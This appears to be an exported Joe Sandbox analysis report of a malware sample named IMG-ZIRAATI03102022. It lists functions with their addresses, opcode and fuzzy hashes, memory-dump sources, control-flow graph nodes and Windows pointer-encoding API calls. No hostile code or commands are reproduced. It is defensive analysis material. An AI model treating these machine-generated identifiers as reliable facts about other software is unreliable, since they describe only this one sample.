                                                                                                                              Function 06062E90 Relevance: .7, Instructions: 713COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 14165c30015b7ec938f83e87f90a5cceb0c916e31f5dd43ecf252e35b4589234
                                                                                                                              • Instruction ID: ecefce438d3fd7f1a40cae56265dae8347047711793b3bdc20b6082c9e0d2600
                                                                                                                              • Opcode Fuzzy Hash: 14165c30015b7ec938f83e87f90a5cceb0c916e31f5dd43ecf252e35b4589234
                                                                                                                              • Instruction Fuzzy Hash: 28423C75E042598FDB59CFA9C8809AEBBB2FF88310F29C55AE814EB315D7359C41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06063350 Relevance: .6, Instructions: 634COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4295c29c047e037d8f5ca020be9bae57a87bc267a8e9d75f10cdfe239630a544
                                                                                                                              • Instruction ID: 3c0b1277bab3ecf36ed05054d210a60376299a308bf3060b6cc507f8ee8badb8
                                                                                                                              • Opcode Fuzzy Hash: 4295c29c047e037d8f5ca020be9bae57a87bc267a8e9d75f10cdfe239630a544
                                                                                                                              • Instruction Fuzzy Hash: 4E323E75E002198FDB58CFA9C880AAEBBF2FF88310F19C566E815EB355D6759C41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06069188 Relevance: .4, Instructions: 368COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 58cf90e494dd139ae7824d71f76fd45530f7975838a8355e4a2e130c46125deb
                                                                                                                              • Instruction ID: 01fa9d9b2ff4f8ecc8b20041f6fbb19b37fdae2354641fa9a4e0dc89593fae66
                                                                                                                              • Opcode Fuzzy Hash: 58cf90e494dd139ae7824d71f76fd45530f7975838a8355e4a2e130c46125deb
                                                                                                                              • Instruction Fuzzy Hash: A8D1B175B40622CFCBD8DF7AC45452DBBE2AF8821471684AAE90BCB761CB70DC418B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06062BF8 Relevance: .3, Instructions: 259COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 77921d4ded2dd1cb69988bad397a7d498c2f7af1a441b813fa96c5c984cdee13
                                                                                                                              • Instruction ID: b5d156f9ddb6fbaf5f63cb387c37bbc1ec59e2d587669cc729fcf41a8535a49a
                                                                                                                              • Opcode Fuzzy Hash: 77921d4ded2dd1cb69988bad397a7d498c2f7af1a441b813fa96c5c984cdee13
                                                                                                                              • Instruction Fuzzy Hash: 5FA1C175E04A1A8FCB41CFADC8C04AEFBF1BF49310B55856AE915EB245D330EA51CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 012226B1 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlDecodePointer.NTDLL ref: 0122271C
                                                                                                                              • RtlDecodePointer.NTDLL ref: 0122275B
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 012227C2
                                                                                                                              • RtlDecodePointer.NTDLL(00000000), ref: 012227FE
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 01222838
                                                                                                                              • RtlDecodePointer.NTDLL ref: 01222878
                                                                                                                              • RtlDecodePointer.NTDLL ref: 012228B6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$Decode$Encode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1638560559-0
                                                                                                                              • Opcode ID: a500e0eeb161e4dac1768cb2939ed8a81b3cf902871f653a8d9dc12150aa0bcc
                                                                                                                              • Instruction ID: 2064df6ce755f119e97eb115f435558e5f6a904b83f041406ebcb6b5fe36535e
                                                                                                                              • Opcode Fuzzy Hash: a500e0eeb161e4dac1768cb2939ed8a81b3cf902871f653a8d9dc12150aa0bcc
                                                                                                                              • Instruction Fuzzy Hash: 8E717A708143A6DFEF21CFA9C54839EBFF0BB19308F148419E555A7290C3BA5589CFA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 012226C0 Relevance: 10.6, APIs: 7, Instructions: 146COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlDecodePointer.NTDLL ref: 0122271C
                                                                                                                              • RtlDecodePointer.NTDLL ref: 0122275B
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 012227C2
                                                                                                                              • RtlDecodePointer.NTDLL(00000000), ref: 012227FE
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 01222838
                                                                                                                              • RtlDecodePointer.NTDLL ref: 01222878
                                                                                                                              • RtlDecodePointer.NTDLL ref: 012228B6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$Decode$Encode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1638560559-0
                                                                                                                              • Opcode ID: aa5acf5675f5498057011b8b54b922b0259ba034d1c672a640dde22e7a6ecfea
                                                                                                                              • Instruction ID: 6b607c61e246a2cc770b6c75b384dfc3a873d43f062998a174c261d51202dec5
                                                                                                                              • Opcode Fuzzy Hash: aa5acf5675f5498057011b8b54b922b0259ba034d1c672a640dde22e7a6ecfea
                                                                                                                              • Instruction Fuzzy Hash: 7F6149708143A6DFEF20CFA9C54839EBFF0BB19318F148519E565B6290C7BA5584CFA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:11.1%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:44
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 29851 5e5c508 29852 5e5c51c 29851->29852 29853 5e5c525 29852->29853 29855 5e5c75a 29852->29855 29862 5e5c956 29855->29862 29866 5e5c9b8 29855->29866 29871 5e5c93c 29855->29871 29875 5e5c830 29855->29875 29879 5e5c840 29855->29879 29863 5e5c969 29862->29863 29864 5e5c97b 29862->29864 29883 5e5cc38 29863->29883 29864->29864 29867 5e5c9be 29866->29867 29896 5e5cef1 29867->29896 29900 5e5cf00 29867->29900 29868 5e5c763 29868->29853 29872 5e5c8ef 29871->29872 29872->29871 29873 5e5c97b 29872->29873 29874 5e5cc38 2 API calls 29872->29874 29874->29873 29876 5e5c884 29875->29876 29877 5e5c97b 29876->29877 29878 5e5cc38 2 API calls 29876->29878 29878->29877 29880 5e5c884 29879->29880 29881 5e5c97b 29880->29881 29882 5e5cc38 2 API calls 29880->29882 29882->29881 29884 5e5cc56 29883->29884 29888 5e5cc89 29884->29888 29892 5e5cc98 29884->29892 29885 5e5cc66 29885->29864 29889 5e5cc98 29888->29889 29890 5e5ccfc RtlEncodePointer 29889->29890 29891 5e5cd25 29889->29891 29890->29891 29891->29885 29893 5e5ccd2 29892->29893 29894 5e5ccfc RtlEncodePointer 29893->29894 29895 5e5cd25 29893->29895 29894->29895 29895->29885 29897 5e5cf00 29896->29897 29904 5e5cf39 29897->29904 29898 5e5cf1e 29898->29868 29901 5e5cf0e 29900->29901 29903 5e5cf39 RtlEncodePointer 29901->29903 29902 5e5cf1e 29902->29868 29903->29902 29905 5e5cf81 29904->29905 29906 5e5cfa7 RtlEncodePointer 29905->29906 29907 5e5cfd0 29905->29907 29906->29907 29907->29898

                                                                                                                              Executed Functions

                                                                                                                              Function 01361238 Relevance: 3.2, Strings: 2, Instructions: 689COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 1361238-1361239 1 1361205-1361217 0->1 2 136123b-1361fed 0->2 3 136121f-136122e 1->3 5 1361219 call 1363f90 1->5 6 1361219 call 1363f81 1->6 5->3 6->3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.604666560.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1360000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2 $[sr
                                                                                                                              • API String ID: 0-3644076740
                                                                                                                              • Opcode ID: 8d8e126ce52cf4738bdf57cf7b7c609dcd68398ee1be849eca870fc7102f44fc
                                                                                                                              • Instruction ID: 1332a8a3d9b191ed52489314589c56da9229abe568bfee1973578a70981d0433
                                                                                                                              • Opcode Fuzzy Hash: 8d8e126ce52cf4738bdf57cf7b7c609dcd68398ee1be849eca870fc7102f44fc
                                                                                                                              • Instruction Fuzzy Hash: 8B926371C217AB8ADB219F6488443C9F771BFA6304F659B96D5483B101EBB027DACF81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 05E5CC89 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 124 5e5cc89-5e5ccda 128 5e5cce0 124->128 129 5e5ccdc-5e5ccde 124->129 130 5e5cce5-5e5ccf0 128->130 129->130 131 5e5cd51-5e5cd5e 130->131 132 5e5ccf2-5e5cd23 RtlEncodePointer 130->132 134 5e5cd25-5e5cd2b 132->134 135 5e5cd2c-5e5cd4c 132->135 134->135 135->131
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 05E5CD12
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.613027966.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_5e50000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: d1100f6adc57624727ef6db47797b1d850ab98229bede4de191b08578eea178d
                                                                                                                              • Instruction ID: f64c12b5776bd06b53c94d84550261fbf53274e11b282a2672c79d035dcc9690
                                                                                                                              • Opcode Fuzzy Hash: d1100f6adc57624727ef6db47797b1d850ab98229bede4de191b08578eea178d
                                                                                                                              • Instruction Fuzzy Hash: E4216AB59003888FDB20DFA9C54979EBFF4FB49368F208029D849E3640D7399944CFA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 05E5CF39 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 137 5e5cf39-5e5cf88 call 5e5cd70 call 5e5cdc8 142 5e5cf8e 137->142 143 5e5cf8a-5e5cf8c 137->143 144 5e5cf93-5e5cf9b 142->144 143->144 145 5e5cff7-5e5d009 144->145 146 5e5cf9d-5e5cfce RtlEncodePointer 144->146 148 5e5cfd7-5e5cfed 146->148 149 5e5cfd0-5e5cfd6 146->149 148->145 149->148
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 05E5CFBD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.613027966.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_5e50000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: 97cbda7e85ecb9a0bfaca03d43d7687bf31364a210103c5b06d78e57e67361f0
                                                                                                                              • Instruction ID: e3f64375d0985e3abf867091888e4cea0d3ff5a298ec3b5c3f0091652bb13d52
                                                                                                                              • Opcode Fuzzy Hash: 97cbda7e85ecb9a0bfaca03d43d7687bf31364a210103c5b06d78e57e67361f0
                                                                                                                              • Instruction Fuzzy Hash: 75218EB69043988FDB20CFA9D5457DEBFF4EB44324F204429E848E7640D778A944CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 05E5CC98 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 151 5e5cc98-5e5ccda 154 5e5cce0 151->154 155 5e5ccdc-5e5ccde 151->155 156 5e5cce5-5e5ccf0 154->156 155->156 157 5e5cd51-5e5cd5e 156->157 158 5e5ccf2-5e5cd23 RtlEncodePointer 156->158 160 5e5cd25-5e5cd2b 158->160 161 5e5cd2c-5e5cd4c 158->161 160->161 161->157
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 05E5CD12
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.613027966.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_5e50000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: 9cc03bfd1a59e929fbede0b3c8ff76e3eaa3c4f1c5161fe044ec93f9111911eb
                                                                                                                              • Instruction ID: d7d12205e9b8dda38ebf5ec1ac47aa966101e6fe4d29cd61554d783c112a8f52
                                                                                                                              • Opcode Fuzzy Hash: 9cc03bfd1a59e929fbede0b3c8ff76e3eaa3c4f1c5161fe044ec93f9111911eb
                                                                                                                              • Instruction Fuzzy Hash: 481147B09003888FDB20CFA9C54979EBFF4FB49364F208029D849E3A00D7796944CFA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0136EC10 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 163 136ec10-136ec25 164 136ec27-136ec2c call 136eb20 163->164 165 136ec31-136ec68 163->165 164->165 168 136ec6e-136ec77 165->168 169 136ee6d-136eea3 165->169 170 136ed26-136ed2d 168->170 171 136ec7d-136ec89 168->171 184 136eea5-136eef5 call 136f300 169->184 185 136ef02-136ef09 169->185 172 136ed5f-136ed6e 170->172 173 136ed2f-136ed41 170->173 171->169 174 136ec8f-136ec98 171->174 177 136ed70-136ed96 172->177 178 136ed99-136eda5 172->178 173->169 176 136ed47-136ed5d 173->176 179 136ecfc-136ed0b 174->179 180 136ec9a-136ecb3 174->180 182 136eda8-136edb4 176->182 177->178 178->182 179->169 183 136ed11-136ed20 179->183 180->179 189 136ecb5-136ecbb 180->189 182->169 188 136edba-136edd2 182->188 183->170 183->171 207 136eefb 184->207 188->169 190 136edd8-136ee09 188->190 193 136ecc7-136ecd3 189->193 194 136ecbd 189->194 190->169 198 136ee0b-136ee1c 190->198 193->169 195 136ecd9-136ecf9 193->195 194->193 199 136ee63-136ee6a 198->199 200 136ee1e-136ee2b 198->200 200->199 204 136ee2d-136ee5a 200->204 204->199 207->185
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.604692162.0000000001363000.00000040.00000800.00020000.00000000.sdmp, Offset: 01363000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1363000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: d
                                                                                                                              • API String ID: 0-2564639436
                                                                                                                              • Opcode ID: 8fe1165f64fe1134b53362ba24097a9be5306eaf362e234f1adb0c5e9e6594e9
                                                                                                                              • Instruction ID: 755517852e25adc18622c0d46e3d9a74be4858924ba5de93fd8831bfc2fbce20
                                                                                                                              • Opcode Fuzzy Hash: 8fe1165f64fe1134b53362ba24097a9be5306eaf362e234f1adb0c5e9e6594e9
                                                                                                                              • Instruction Fuzzy Hash: 3CB1E778A002198FCF05CF58C8809ADB7B6FF89314B55C6A5E905AB35AD734ED45CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B7D08 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 211 53b7d08-53b7d3e 213 53b7d58-53b7d77 211->213 214 53b7d40-53b7d55 211->214 217 53b7ebd-53b7ec9 213->217 218 53b7d7d-53b7daf 213->218 226 53b7ecc call 5e31b43 217->226 227 53b7ecc call 5e31eb0 217->227 228 53b7ecc call 5e316e4 217->228 229 53b7ecc call 5e31868 217->229 230 53b7ecc call 5e31e8f 217->230 231 53b7ecc call 5e3185e 217->231 232 53b7ecc call 5e316fd 217->232 222 53b7dc8-53b7de5 218->222 223 53b7db1-53b7dc0 218->223 219 53b7ece-53b7ed4 222->217 223->222 226->219 227->219 228->219 229->219 230->219 231->219 232->219
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2
                                                                                                                              • API String ID: 0-450215437
                                                                                                                              • Opcode ID: eccbc7a10983108c8e5bbe1b1e63249438c6e29deb022fc1080c3c1203b5d315
                                                                                                                              • Instruction ID: 49f126d4dedd00b9a054b7910f9a0f8245a26597400263d435b150d9ed4f04fe
                                                                                                                              • Opcode Fuzzy Hash: eccbc7a10983108c8e5bbe1b1e63249438c6e29deb022fc1080c3c1203b5d315
                                                                                                                              • Instruction Fuzzy Hash: 4B314D35A01118EFDF05DFA4E8949EDBBB6FF89310F10806AE901A7350DB71A959DB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B9700 Relevance: .5, Instructions: 539COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 693 53b9700-53b9714 694 53b996b-53b996f 693->694 695 53b971a-53b9720 693->695 698 53b9ad0-53b9ad4 694->698 699 53b9975-53b997b 694->699 696 53b97fc-53b97ff 695->696 697 53b9726-53b972c 695->697 702 53b984f-53b9852 696->702 703 53b9801-53b9807 696->703 700 53b972e-53b9734 697->700 701 53b9795-53b979b 697->701 704 53b9b3b-53b9b3f 698->704 705 53b9ad6-53b9adc 698->705 706 53b9998-53b999b 699->706 707 53b997d-53b9993 699->707 711 53b9738-53b9744 700->711 712 53b9736 700->712 713 53b979f-53b97ab 701->713 714 53b979d 701->714 702->694 710 53b9858-53b9882 702->710 717 53b980b-53b9817 703->717 718 53b9809 703->718 715 53b9c1c-53b9c48 704->715 716 53b9b45-53b9b6f 704->716 705->704 719 53b9ade-53b9af7 705->719 708 53b999d-53b99a3 706->708 709 53b99f7-53b99fa 706->709 729 53b9c0d-53b9c14 707->729 721 53b99a7-53b99b3 708->721 722 53b99a5 708->722 709->698 724 53b9a00-53b9a2a 709->724 784 53b9897-53b989d 710->784 785 53b9884-53b9891 710->785 723 53b9746-53b9751 711->723 712->723 726 53b97ad-53b97b8 713->726 714->726 773 53b9c4a-53b9c6c call 53b89a0 715->773 774 53b9ca2-53b9ca8 715->774 787 53b9b71-53b9b7e 716->787 788 53b9b80-53b9bc7 716->788 725 53b9819-53b984a 717->725 718->725 744 53b9afb-53b9b07 719->744 745 53b9af9 719->745 730 53b99b5-53b99f2 721->730 722->730 732 53b9753 723->732 733 53b9755-53b9761 723->733 796 53b9a3b-53b9a82 724->796 797 53b9a2c-53b9a39 724->797 725->729 727 53b97ba 726->727 728 53b97bc-53b97c8 726->728 740 53b97ca-53b97d5 727->740 728->740 730->729 743 53b9763-53b976e 732->743 733->743 748 53b97e1 740->748 749 53b97d7-53b97d9 740->749 753 53b977a 743->753 754 53b9770-53b9772 743->754 751 53b9b09-53b9b14 744->751 745->751 760 53b97e3-53b97f7 748->760 758 53b97df 749->758 759 53b9c17 749->759 763 53b9b18-53b9b2a 751->763 764 53b9b16 751->764 767 53b977c-53b9790 753->767 754->759 765 53b9778 754->765 758->760 759->715 760->729 771 53b9b2c-53b9b36 763->771 764->771 765->767 767->729 771->729 793 53b9c72-53b9c75 773->793 794 53b9d04-53b9d18 773->794 781 53b9caa 774->781 782 53b9cac-53b9cb8 774->782 789 53b9cba-53b9cd6 781->789 782->789 791 53b989f 784->791 792 53b98a1-53b98ad 784->792 785->784 806 53b9922-53b9966 785->806 787->788 810 53b9bc9-53b9c05 787->810 788->729 811 53b9cd8 789->811 812 53b9cde-53b9ce3 789->812 799 53b98af-53b991d 791->799 792->799 800 53b9c77-53b9c7a 793->800 801 53b9ce4-53b9cea 793->801 834 53b9c9e-53b9ca0 794->834 796->729 797->796 823 53b9a87-53b9acb 797->823 799->729 808 53b9d3e-53b9d51 800->808 809 53b9c80-53b9c86 800->809 814 53b9cee-53b9cf8 801->814 815 53b9cec 801->815 806->729 826 53b9d58-53b9d7d 808->826 817 53b9c8a-53b9c94 809->817 818 53b9c88 809->818 810->729 821 53b9d1a-53b9d20 811->821 822 53b9cda-53b9cdc 811->822 824 53b9cfa-53b9d02 814->824 815->824 829 53b9c96-53b9c9b 817->829 818->829 821->826 827 53b9d22-53b9d3d 821->827 822->812 822->821 823->729 824->834 846 53b9d7f-53b9d95 call 53b8330 826->846 847 53b9d96-53b9dbc call 53b9dc0 826->847 829->834 834->774 834->789
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eb84409946dfa44a8752ce866e73a497aee4aace1d5a542bcfe4b9e013b4862c
                                                                                                                              • Instruction ID: 4b887bb04af335f2b85f1b4df0207498e4edef024615061d1c13fa537626b05a
                                                                                                                              • Opcode Fuzzy Hash: eb84409946dfa44a8752ce866e73a497aee4aace1d5a542bcfe4b9e013b4862c
                                                                                                                              • Instruction Fuzzy Hash: DE12E476B002148FCB24DF68C494ABDB7F6FF89214B15846AE60ACBB61DBB4DC41CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 05E31868 Relevance: .4, Instructions: 373COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1027 5e31868-5e31890 1028 5e31896-5e3189b 1027->1028 1029 5e31b44-5e31b8f 1027->1029 1030 5e318b3-5e318bc 1028->1030 1031 5e3189d-5e318a3 1028->1031 1036 5e31b95-5e31b9e 1029->1036 1037 5e31d0b-5e31d34 1029->1037 1030->1029 1035 5e318c2-5e318c7 1030->1035 1033 5e318a7-5e318b1 1031->1033 1034 5e318a5 1031->1034 1033->1030 1034->1030 1038 5e318c9-5e318cf 1035->1038 1039 5e318df-5e318e8 1035->1039 1041 5e31ba0-5e31ba2 1036->1041 1042 5e31bac-5e31bb8 1036->1042 1050 5e31d36-5e31d3c 1037->1050 1051 5e31d4c-5e31d55 1037->1051 1044 5e318d3-5e318dd 1038->1044 1045 5e318d1 1038->1045 1039->1029 1040 5e318ee-5e318f7 1039->1040 1047 5e31905-5e31911 1040->1047 1048 5e318f9-5e318fb 1040->1048 1041->1042 1042->1037 1049 5e31bbe-5e31bc7 1042->1049 1044->1039 1045->1039 1047->1029 1053 5e31917-5e31920 1047->1053 1048->1047 1054 5e31bd5-5e31be1 1049->1054 1055 5e31bc9-5e31bcb 1049->1055 1057 5e31d40-5e31d4a 1050->1057 1058 5e31d3e 1050->1058 1059 5e31922-5e31924 1053->1059 1060 5e3192e-5e3193a 1053->1060 1054->1037 1056 5e31be7-5e31bf0 1054->1056 1055->1054 1061 5e31bf2-5e31bf4 1056->1061 1062 5e31bfe-5e31c0a 1056->1062 1057->1051 1058->1051 1059->1060 1060->1029 1064 5e31940-5e31949 1060->1064 1061->1062 1062->1037 1065 5e31c10-5e31c19 1062->1065 1067 5e31957-5e31964 1064->1067 1068 5e3194b-5e3194d 1064->1068 1070 5e31c27-5e31c33 1065->1070 1071 5e31c1b-5e31c1d 1065->1071 1067->1029 1069 5e3196a-5e31973 1067->1069 1068->1067 1072 5e31981-5e3198d 1069->1072 1073 5e31975-5e31977 1069->1073 1070->1037 1074 5e31c39-5e31c42 1070->1074 1071->1070 1072->1029 1075 5e31993-5e3199c 1072->1075 1073->1072 1076 5e31c50-5e31c64 1074->1076 1077 5e31c44-5e31c46 1074->1077 1078 5e319aa-5e319b6 1075->1078 1079 5e3199e-5e319a0 1075->1079 1084 5e31c66-5e31c6c 1076->1084 1085 5e31c7e-5e31c94 1076->1085 1077->1076 1078->1029 1080 5e319bc-5e319c1 1078->1080 1079->1078 1082 5e319c3-5e319c9 1080->1082 1083 5e319d9-5e319e2 1080->1083 1086 5e319cb 1082->1086 1087 5e319cd-5e319d7 1082->1087 1083->1029 1088 5e319e8-5e319f1 1083->1088 1089 5e31c70-5e31c7c 1084->1089 1090 5e31c6e 1084->1090 1093 5e31c99-5e31cf4 1085->1093 1086->1083 1087->1083 1091 5e319f3-5e319f5 1088->1091 1092 5e319ff-5e31a14 1088->1092 1089->1085 1090->1085 1091->1092 1092->1029 1095 5e31a1a-5e31a23 1092->1095 1093->1037 1098 5e31a31-5e31a59 1095->1098 1099 5e31a25-5e31a27 1095->1099 1102 5e31a5b-5e31a64 1098->1102 1103 5e31a7c 1098->1103 1099->1098 1106 5e31a66-5e31a69 1102->1106 1107 5e31a6b-5e31a78 1102->1107 1105 5e31a7f-5e31aa2 1103->1105 1110 5e31aa7-5e31b2d 1105->1110 1108 5e31a7a 1106->1108 1107->1108 1108->1105 1110->1029
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612963346.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_5e30000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3ddcb0431e8e1845beb03f0606022e050192c0d45a65cc620a8cd965e5dfd2b
                                                                                                                              • Instruction ID: 14b5acfbdea41e36dbaabf70456d3ff87396ee9f07c661a88eea1f23eada8ed5
